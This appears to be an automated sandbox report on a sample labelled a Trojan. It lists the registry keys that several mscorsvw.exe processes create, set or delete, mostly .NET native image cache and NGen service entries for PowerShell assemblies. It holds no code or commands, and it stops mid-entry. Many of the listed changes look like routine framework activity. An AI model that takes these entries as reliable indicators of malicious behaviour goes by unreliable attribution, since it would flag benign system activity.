The process mscorsvw.exe:3832 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 2E 99 F9 6E 23 22 F6 0C 1E C1 DC 28 5C D6 3E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "1E E0 20 9C CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]

The process mscorsvw.exe:3872 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 78 59 96 55 F8 F6 E6 62 78 0A 2C 8B 95 4D 0E"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:304 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 BB 62 C1 60 3B 1E 54 2C 47 CF 4B 3A F7 FF E9"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "54 91 20 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 96 46 4C 1A DA 27 42 2E 43 8E CA A9 72 4B 03"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]

The process mscorsvw.exe:1556 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 4D 5B 62 51 0B D5 0C 9F 03 9B 98 20 66 19 2D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "18 68 49 9C CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]

The process mscorsvw.exe:2536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "B8 8D 6F 9C CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 13 BB A4 3C DC E6 A0 68 6A F5 45 E8 8D 1A C9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]

The process mscorsvw.exe:2000 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
